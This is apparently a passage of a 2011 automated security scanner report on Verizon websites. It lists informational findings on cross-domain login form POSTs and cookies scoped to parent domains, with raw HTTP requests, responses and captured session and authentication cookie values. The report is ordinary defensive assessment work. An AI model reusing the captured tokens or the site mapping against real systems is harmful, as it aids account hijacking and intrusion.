RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com

Response

HTTP/1.0 200 OK
Content-Length: 21389
Content-Type: application/x-javascript
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js
Last-Modified: Thu, 01 Sep 2011 17:52:00 GMT
Accept-Ranges: bytes
ETag: "0204bd9cf68cc1:615d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:25:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:06 GMT
Connection: keep-alive

/* global constants */
var IMAGEFOLDER = "../Common/images/";
/* Javscript code moved from ascx to this page */
/* From tos.ascx */
var FirstTimeIndex = true;
var sPlatformIndex = '<%=sOSPlatform%>';

function onChange()
           {

               var highspeed= '<%=sHighSpeed%>'; //fios high speed
               var fiftymbps= '<%=sFiftyMbps%>'; //fios high speed
               var VD    = '<%=IsVDSL%>';
               var state = '<%=_state%>';
               var OSIndex = '<%=sOSPlatform%>';
               var FiosSpeedIndex=1,counter;
               if(document.forms[0].operating01 != null)
               switch(document.forms[0].operating01.selectedIndex)
               {
               case 0:
return; break
...[SNIP]...
ease use the 'Contact Us' link below." ){


               var url ='../Common/OrderInsertComments.aspx?Comments=' + escape(filterSpecialChars(document.forms[0].Comments.value)) + '&PS_PageURI=' + '<%=pageUrl%>' + '&TelNo=' + '<%=btn%>' + '&SesID=' + '<%=sessionId%>' + '&AppID=' + '<%=appId%>' + '&fttpavail=' + '<%=fttpAvail%>' + '&fttpSel=' + '<%=fttpSel%>';

       mywindow = window.open(url, '_blank','location=no,menubar=no,status=no,titlebar=no,directories=no,toolbar=no,left=1000,top=1000,width=100,height=100');


                       document.forms[0].
...[SNIP]...

13. Cross-domain POST previous next
There are 10 instances of this issue:

http://b2b.vzw.com/industrysolutions/index.html
http://b2b.vzw.com/industrysolutions/index.html
http://www.connecttoverizon.com/
http://www.connecttoverizon.com/
http://www.connecttoverizon.com/loginFailed.html
http://www.connecttoverizon.com/loginFailed.html
http://www.connecttoverizon.com/order-now.html
http://www.connecttoverizon.com/order-now.html
http://www.verizonwireless.com/b2c/aboutUs/affiliate/index.jsp
http://www.verizonwireless.com/b2c/index.html

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

13.1. http://b2b.vzw.com/industrysolutions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b2b.vzw.com
Path:	/industrysolutions/index.html

Issue detail

The page contains a form which POSTs data to the domain enterprisecenter.verizon.com. The form contains the following fields:

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Type: text/html
X-Cacheable: NO: !obj.cacheable
Content-Length: 20859
Date: Mon, 05 Sep 2011 21:56:40 GMT
X-Varnish: 1491768482
Age: 0
Via: 1.1 varnish
Connection: keep-alive

...[SNIP]...
<div class="login_content hidden">
<form name="vzeForm" id="vzeForm" method="post" action="https://EnterpriseCenter.verizon.com/enterprisesolutions/Default/login.fcc">
<div class="fixer_10">
...[SNIP]...

13.2. http://b2b.vzw.com/industrysolutions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b2b.vzw.com
Path:	/industrysolutions/index.html

Issue detail

The page contains a form which POSTs data to the domain mblogin.verizonwireless.com. The form contains the following fields:

rememberUserNameCheckBoxExists
IDToken1
IDToken2
realm
gx_charset
goto
login

Request

Response

13.3. http://www.connecttoverizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

uname
upwd
Go
id
loginPageUrl
loginFailedUrl

Request

Response

13.4. http://www.connecttoverizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

streetAddress
apartmentNumber
zipcode
bpID
eID
packageID
city
state
scKey
spId
keyword
scpId
Submit

Request

Response

13.5. http://www.connecttoverizon.com/loginFailed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/loginFailed.html

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

uname
upwd
Go
id
loginPageUrl
loginFailedUrl

Request

Response

13.6. http://www.connecttoverizon.com/loginFailed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/loginFailed.html

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

uname
upwd
Submit
id
loginPageUrl
loginFailedUrl

Request

Response

13.7. http://www.connecttoverizon.com/order-now.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/order-now.html

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

uname
upwd
Go
id
loginPageUrl
loginFailedUrl

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.8. http://www.connecttoverizon.com/order-now.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/order-now.html

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

streetAddress
apartmentNumber
zipcode
Submit
scKey
spId
keyword
packageID
city
state
bpID
eID
suMode
rand

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.9. http://www.verizonwireless.com/b2c/aboutUs/affiliate/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/aboutUs/affiliate/index.jsp

Issue detail

The page contains a form which POSTs data to the domain www.connectcommerce.com. The form contains the following fields:

Join Program

Request

GET /b2c/aboutUs/affiliate/index.jsp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.10. http://www.verizonwireless.com/b2c/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/index.html

Issue detail

The page contains a form which POSTs data to the domain enterprisecenter.verizon.com. The form contains the following fields:

Request

GET /b2c/index.html?tab=business HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

14. Cookie scoped to parent domain previous next
There are 100 instances of this issue:

http://ak1.abmr.net/is/cache.vzw.com
http://ak1.abmr.net/is/www22.verizon.com
https://auth.verizon.com/amserver/UI/Login
https://auth.verizon.net/amserver/UI/Login
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb
http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif
http://community.adobe.com/help/about.html
http://community.adobe.com/help/rm/sugg.html
http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css
http://d.agkn.com/pixel!t=932!
http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/
http://download.verizon.net/surround/media/misc/images/vidplayer_black_530x272.jpg
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HGct
https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif
https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do
https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js
https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif
https://enterprisecenter.verizon.com/favicon.ico
http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248
http://g-pixel.invitemedia.com/gmatcher
http://get.adobe.com/flashplayer/
http://idcs.interclick.com/Segment.aspx
http://leadback.advertising.com/adcedge/lb
http://leadback.advertising.com/adcedge/lb
https://mblogin.verizonwireless.com/amserver/UI/Login
http://media.verizon.com/media/XmlProxy.ashx
http://media.verizon.com/media/scripts/widget.ashx
http://pixel.mathtag.com/event/img
http://r.turn.com/r/beacon
http://s.xp1.ru4.com/click
http://s.xp1.ru4.com/meta
http://s.xp1.ru4.com/meta
http://sales.liveperson.net/hc/2329305/
http://sales.liveperson.net/hc/2329305/cmd/url/
http://sales.liveperson.net/hc/44153975/
http://search.verizon.com/favicon.ico
http://servedby.flashtalking.com/segment/modify/adg
https://signin.verizon.com/sso/VOLPortalLogin
http://syndicate.verizon.net/ads/regionlocator.ashx
http://tags.bluekai.com/site/4357
http://tap.tapad.com/audience/pxl.png
http://webmail.verizon.com/signin/
http://webmail.verizon.net/signin/
http://webmail.verizon.net/signin/Login.jsp
http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s59195406346116
http://www.facebook.com/dialog/feed
http://www.facebook.com/profile.php
http://www.verizonwireless.com/b2c/index.html
http://www.verizonwireless.com/b2c/store/controller
http://www.verizonwireless.com/b2c/vzwfly
http://www.youtube.com/results
http://www22.verizon.com/content/commontemplates/validlogin.aspx
http://www22.verizon.com/content/verizonglobalhome/Intermediate.aspx
http://www22.verizon.com/content/verizonglobalhome/setValues.aspx
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js
http://www22.verizon.com/onecms/vzcareers/includes/javascript/oo_engine.js
https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX
https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx
https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx
https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx
https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx
https://www22.verizon.com/includes/cache/15/blank.html
https://www22.verizon.com/includes/cache/getwb31.asp
https://www22.verizon.com/includes/javascript/commonjs/
https://www22.verizon.com/includes/javascript/hbx.js/
https://www22.verizon.com/includes/javascript/hbx_custom.js/
https://www22.verizon.com/includes/javascript/sitewise.js/
https://www22.verizon.com/vztracker/vzTracker.aspx

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

14.1. http://ak1.abmr.net/is/cache.vzw.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/cache.vzw.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-EE1D8367D5AACB1E26AA8F0FBEBD6C10ADDCD00A522E6E0942A5B70F0B0B5323-6CB0DFCE7722E5BC43790569F97DA7EA856B7EEF1C2FB591154B5DCDB8F73D15; expires=Tue, 04-Sep-2012 22:14:34 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.2. http://ak1.abmr.net/is/www22.verizon.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www22.verizon.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-30E5D302E7B5AE52FB3FA64F3B114F4C89F6DA2CC7589E047F8A003B02A10801-7B9575B90C2ADB1B3A50CB744273B84103B43421BA655F664BF6383B75DF7234; expires=Tue, 04-Sep-2012 22:13:38 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.3. https://auth.verizon.com/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://auth.verizon.com
Path:	/amserver/UI/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AMAuthCookie=AQIC5wM2LY4SfczpWev%2Bj7wJV5p6Vi3At4%2BjPQ6Fv%2By5Kkk%3D%40AAJTSQACNjkAAlMxAAIwNg%3D%3D%23;Domain=.verizon.com;Path=/
AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.4. https://auth.verizon.net/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://auth.verizon.net
Path:	/amserver/UI/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AMAuthCookie=AQIC5wM2LY4SfczLMfAqxGV1489wz3vJJDjxw2SWemh5VQo%3D%40AAJTSQACMzAAAlMxAAIwNA%3D%3D%23;Domain=.verizon.net;Path=/
AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch 120954-05
Am_client_type: genericHTML
Location: https://www.verizon.net/ssowebapp/VOLPortalLoginnull
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczLMfAqxGV1489wz3vJJDjxw2SWemh5VQo%3D%40AAJTSQACMzAAAlMxAAIwNA%3D%3D%23;Domain=.verizon.net;Path=/
Set-cookie: amlbcookie=04;Domain=.verizon.net;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

14.5. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; expires=Sat, 08-Sep-2018 22:35:47 GMT; path=/; domain=verizon.net
AkaSTrackingID=F03373E721508DB1B1034D461D039B58; path=/; domain=verizon.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.6. http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.vzw.com
Path:	/globalnav/images/nav_bg_sprite.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA; expires=Mon, 03-Oct-2011 22:14:35 GMT; path=/; domain=.vzw.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.7. http://community.adobe.com/help/about.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.adobe.com
Path:	/help/about.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/about.html HTTP/1.1
Host: community.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.8. http://community.adobe.com/help/rm/sugg.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.adobe.com
Path:	/help/rm/sugg.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/rm/sugg.html HTTP/1.1
Host: community.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.9. http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.atomz.com
Path:	/pb00002f7b/publish/includes/css/marquee.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1stsp=A835F590A06A9B4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.atomz.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.10. http://d.agkn.com/pixel!t=932! previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.agkn.com
Path:	/pixel!t=932!

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid=790101267012119588; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sat, 03-Sep-2016 22:15:21 GMT; Path=/
u=6|0BEgV%2BAZ5AAAwAAgBACcBBVirAAUAuwEAnwDOAQCfAJwBAJ8AnQEAnwCeAQCfAQJQfQHlAAAAAAPsKsEAAAAAApZbUAAAAAAOfLfdAWsAHQ%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Wed, 04-Sep-2013 22:15:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.11. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.mediabrandsww.com
Path:	/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Sat, 03-Mar-2012 22:18:33 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.12. http://download.verizon.net/surround/media/misc/images/vidplayer_black_530x272.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.verizon.net
Path:	/surround/media/misc/images/vidplayer_black_530x272.jpg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AkaUTrackingID=D39DBB1D9AAFA74641702E55CE620E29; expires=Sat, 08-Sep-2018 22:42:16 GMT; path=/; domain=verizon.net
AkaSTrackingID=9D33249FECAD5AA85EEBAA50ED9C9B53; path=/; domain=verizon.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.13. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
CTG=1315260820; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:40 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.14. http://ehg-verizon.hitbox.com/HGct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HGct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
CTG=1315260821; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:41 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.15. https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.16. https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/global/gHome.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.17. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/selfreg/javascript/selfreg.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
